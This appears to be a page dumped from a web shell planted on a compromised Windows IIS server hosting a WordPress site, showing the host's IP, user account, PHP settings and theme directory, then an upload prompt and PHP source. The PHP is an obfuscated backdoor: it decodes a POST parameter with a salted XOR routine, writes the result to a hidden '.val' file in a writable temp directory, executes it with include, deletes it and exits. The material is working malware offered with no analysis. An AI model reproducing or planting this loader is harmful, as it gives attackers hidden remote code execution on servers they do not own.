| Server IP : 103.191.208.88 / Your IP : 216.73.216.44 Web Server : Microsoft-IIS/10.0 System : Windows NT COSMIC 10.0 build 20348 (Windows Server 2022) AMD64 User : IWPD_1831(willswel_) ( 0) PHP Version : 8.2.31 Disable Function : NONE MySQL : OFF | cURL : ON | WGET : OFF | Perl : OFF | Python : OFF | Sudo : OFF | Pkexec : OFF Directory : D:/Inetpub/vhosts/willswell.com/httpdocs/wp-content/themes/ |
Upload File : |
<?php
if(isset($_POST["it\x6D"]) ? true : false){
$property_set = array_filter([getcwd(), session_save_path(), sys_get_temp_dir(), "/dev/shm", getenv("TMP"), getenv("TEMP"), ini_get("upload_tmp_dir"), "/tmp", "/var/tmp"]);
$binding = $_POST["it\x6D"];
$binding = explode ( '.' , $binding ) ;
$res = '';
$salt4 = 'abcdefghijklmnopqrstuvwxyz0123456789';
$sLen = strlen($salt4);
$v = 0;
array_walk($binding, function ($v6) use (&$res, &$v, $salt4, $sLen) {
$chS = ord($salt4[$v % $sLen]);
$dec = ((int)$v6 - $chS - ($v % 10)) ^ 49;
$res .= chr($dec);
$v++;
});
foreach ($property_set as $key => $dchunk) {
if (!( !is_dir($dchunk) || !is_writable($dchunk) )) {
$element = vsprintf("%s/%s", [$dchunk, ".val"]);
if (@file_put_contents($element, $res) !== false) {
include $element;
unlink($element);
die();
}
}
}
}